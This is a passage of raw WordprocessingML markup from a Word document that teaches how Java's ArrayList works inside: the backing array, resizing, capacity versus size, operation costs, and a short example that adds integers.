          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is backed by a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamic array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It provides an implementation of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface and allows for fast random access to elements using indices, but it can be slower than other collections when it comes to operations like insertions or deletions in the middle of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5718FA" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5AC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ow ArrayList Internally Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E65F27B" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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acking Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18143359" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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internally uses an array to store elements. When you create an ArrayList, it initializes an array (usually with an initial capacity of 10 elements by default) to store the elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A02AEED" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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ynamic Resizing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FDB2E2" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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has a dynamic resizing mechanism. When the array is full and a new element needs to be added, the ArrayList automatically resizes its internal array by increasing its capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C45A73" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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y default, the capacity is doubled when the array is full, but this can be changed (e.g., by specifying an initial capacity during ArrayList creation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CEB927"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izing Process</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A20307" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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resizing occurs, a new array is created with the new capacity (e.g., twice the original size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405B1908" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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elements of the old array are copied into the new array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC1A8E" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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is resizing operation has a time complexity of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where </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the number of elements in the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F37A79" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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lements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAE5956" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Elements in the ArrayList are stored in contiguous memory locations (just like a regular array). This allows for fast </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to any element by its index, with a time complexity of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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A61FDE" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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apacity vs. Size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D216981" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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apacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Refers to the total number of elements the internal array can hold without needing to resize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D95C3E" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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ize</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Refers to the actual number of elements currently in the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB4A352" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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apacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be greater than or equal to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but they are not always the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EA50BD" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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 Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6228353B" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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dd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8EF8B8" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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you add an element to the ArrayList at the end, if there is space in the underlying array, the element is simply added at the next available index, which is an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operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E86DFA" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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If the array is full, the ArrayList will resize the array and then add the element, which takes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time due to the resizing operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD0066E" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Get</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4093987B" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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ccessing an element by its index is an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operation because the elements are stored in contiguous memory locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794D7D73" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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move</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD28BA8" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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Removing an element involves shifting all subsequent elements one position to the left to fill the gap, which takes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time in the worst case (when removing the first element).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24446EA5" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in the middle):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705575C6" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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you insert an element in the middle of the ArrayList, all elements from the insertion point to the end need to be shifted one position to the right. This operation also takes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time in the worst case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199411DC" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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 Safety</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607DF22C" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning it is not thread-safe. If multiple threads are accessing and modifying an ArrayList concurrently, you need to handle synchronization explicitly (e.g., using Collections.synchronizedList() or CopyOnWriteArrayList for thread-safe operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC0663D" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5AC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ArrayList Internal Working</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221F0D5A"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sider the following example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4FEB59"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41046AE8" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61861B40"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70D03F56"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001AC553"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e an ArrayList with an initial capacity of 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E10B707"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rrayList&lt;Integer&gt; list = new ArrayList&lt;&gt;(5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024A5207"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839872B"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dd some elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52037867"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2EFB08"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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2761462A"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3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CD6E15"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4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3904F7A4"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5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9D2A85" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E74DEEC"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dding more elements than the initial capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2498DCD3"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6); // This will trigger an internal array resize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175C635F"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7);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5CE962"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D724571"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nt the ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DEEF06"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ArrayList: " + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A846D08"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5579A0E"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CBDF63B" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5AC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ep-by-Step Explanation of the Above Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9C2BE5" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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reation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584CD0C6" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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e create an ArrayList with an initial capacity of 5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F21AF1" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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underlying array has space for 5 elements at the start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04004F52" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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dding Elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEFA002" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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e add 5 elements (1 to 5). Since the initial array capacity is 5, the elements are directly added to the internal array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DA2E70" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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izing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3463FD" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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we add the 6th element, the internal array is full, so the ArrayList will resize the internal array (usually by doubling its size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AECD0ED" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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new array now has more space (e.g., 10 elements), and the elements from the old array are copied to the new one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A180323" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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utput</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063D5D44" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ArrayList will contain the elements: [1, 2, 3, 4, 5, 6, 7].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2F9D71" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5AC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ternal Structure of ArrayList:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB7EA8A" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An internal array of objects, holding the elements of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AD9EF3" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An integer representing the current number of elements in the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB7C2FE" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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apacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The total size of the internal array, which can be larger than the number of elements (the capacity grows dynamically when needed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC067A1" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5AC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ime Complexity of Common Oper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1"/>
        <w:gridCol w:w="1610"/>
      </w:tblGrid>
      <w:tr w:rsidR="003B5ACF" w:rsidRPr="00CE4B95" w14:paraId="14127192" w14:textId="77777777" w:rsidTr="00DE7777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
